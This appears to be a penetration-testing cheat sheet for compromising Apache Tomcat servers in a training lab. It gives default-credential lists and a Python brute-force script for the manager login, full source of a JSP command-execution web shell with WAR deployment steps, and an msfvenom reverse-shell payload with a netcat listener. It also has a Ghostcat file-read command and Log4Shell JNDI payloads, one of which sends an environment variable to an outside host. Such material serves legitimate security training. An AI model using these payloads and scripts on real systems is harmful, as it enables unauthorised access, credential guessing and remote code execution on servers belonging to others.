Discovery
http://app-dev.inlanefreight.local:8080/invalid
Copy $ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
<SNIP> Interesting Files
WEB-INF/web.xml
tomcat-users.xml
Copy < SNIP >
!-- user manager can access only manager section -->
< role rolename = "manager-gui" />
< user username = "tomcat" password = "tomcat" roles = "manager-gui" />
<!-- user admin can access manager and admin section both -->
< role rolename = "admin-gui" />
< user username = "admin" password = "admin" roles = "manager-gui,admin-gui" />
</ tomcat-users > Enumeration
Copy gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt Password
tomcat::Tomcatadm
Copy osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) | admin | admin |
| apache tomcat host manager (web) | ADMIN | ADMIN |
| apache tomcat host manager (web) | admin | <blank> |
| apache tomcat host manager (web) | admin | j5Brn9 |
| apache tomcat host manager (web) | admin | tomcat |
| apache tomcat host manager (web) | cxsdk | kdsxc |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) | ovwebusr | OvW*busr1 |
| apache tomcat host manager (web) | QCC | QLogic66 |
| apache tomcat host manager (web) | role1 | role1 |
| apache tomcat host manager (web) | role1 | tomcat |
| apache tomcat host manager (web) | role | changethis |
| apache tomcat host manager (web) | root | root |
| apache tomcat host manager (web) | tomcat | changethis |
| apache tomcat host manager (web) | tomcat | s3cret |
| apache tomcat host manager (web) | tomcat | tomcat |
| apache tomcat host manager (web) | xampp | xampp |
+----------------------------------+------------+------------
Copy cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis Tomcat Manager - Login Brute Force
Copy msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58 mgr_brute.py
Copy #!/usr/bin/python
import requests
from termcolor import cprint
import argparse
parser = argparse . ArgumentParser (description = "Tomcat manager or host-manager credential bruteforcing" )
parser . add_argument ( "-U" , "--url" , type = str , required = True , help = "URL to tomcat page" )
parser . add_argument ( "-P" , "--path" , type = str , required = True , help = "manager or host-manager URI" )
parser . add_argument ( "-u" , "--usernames" , type = str , required = True , help = "Users File" )
parser . add_argument ( "-p" , "--passwords" , type = str , required = True , help = "Passwords Files" )
args = parser . parse_args ()
url = args . url
uri = args . path
users_file = args . usernames
passwords_file = args . passwords
new_url = url + uri
f_users = open (users_file, "rb" )
f_pass = open (passwords_file, "rb" )
usernames = [x . strip () for x in f_users]
passwords = [x . strip () for x in f_pass]
cprint ( "\n[+] Atacking....." , "red" , attrs = [ 'bold' ])
for u in usernames :
for p in passwords :
r = requests . get (new_url,auth = (u, p))
if r . status_code == 200 :
cprint ( "\n[+] Success!!" , "green" , attrs = [ 'bold' ])
cprint ( "[+] Username : {} \n[+] Password : {} " . format (u,p), "green" , attrs = [ 'bold' ])
break
if r . status_code == 200 :
break
if r . status_code != 200 :
cprint ( "\n[+] Failed!!" , "red" , attrs = [ 'bold' ])
cprint ( "[+] Could not Find the creds :( " , "red" , attrs = [ 'bold' ])
#print r.status_code
Copy $ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
[+] Atacking.....
[+] Success!!
[+] Username : b'tomcat'
[+] Password : b'admin' Tomcat Manager - WAR File Upload
Manually
jsp shell: https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Copy <% @ page import = "java.util.*,java.io.*" %>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
< HTML >< BODY >
<FORM METHOD = "GET" NAME = "myform" ACTION = "" >
<INPUT TYPE = "text" NAME = "cmd" >
<INPUT TYPE = "submit" VALUE = "Send" >
</ FORM >
< pre >
<%
if ( request . getParameter ( "cmd" ) != null ) {
out . println ( "Command: " + request . getParameter ( "cmd" ) + "<BR>" );
Process p = Runtime . getRuntime () . exec ( request . getParameter ( "cmd" ));
OutputStream os = p . getOutputStream ();
InputStream in = p . getInputStream ();
DataInputStream dis = new DataInputStream(in) ;
String disr = dis . readLine ();
while ( disr != null ) {
out . println (disr);
disr = dis . readLine ();
}
}
%>
</ pre >
</ BODY ></ HTML >
Copy $ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%) Browse to select the .war file and then click on Deploy.
Copy $ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
</pre>
</BODY></HTML> Msfvenom
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
Copy nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat) Metasploit
multi/http/tomcat_mgr_upload
Exploitation
Web Shell CVE-2024-50379
Time-of-Check Time-of-Use (TOCTOU) race condition that can lead to remote code execution (RCE) if the server's configuration allows writable directories.
CVE-2024-52316 - Authentification Bypass
Version Series
Affected Versions
Versions prior to 10.1.31
CVE-2024-40725 and CVE-2024-40898 - SSRF
Apache HTTP Server versions 2.4.0 through 2.4.61
CVE-2024-52318 - XSS
Apache Tomcat 11.0 Versions prior to 11.0.1 Apache Tomcat 10.1 Versions prior to 10.1.33 Apache Tomcat 9.0 Versions prior to 9.0.97
CVE-2024-52317 - Data Leakage
Apache Tomcat 11.0 Versions prior to 11.0.0 Apache Tomcat 10.1 Versions prior to 10.1.31 Apache Tomcat 9.0 Versions prior to 9.0.96
Ghostcat
Copy nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds The exploit can only read files and folders within the web apps folder, which means that files like /etc/passwd can’t be accessed.
Copy python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml Log4Shell
Copy ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload Spring4Shell
Tomcat CGI
Tomcat CGI Tools
Resources
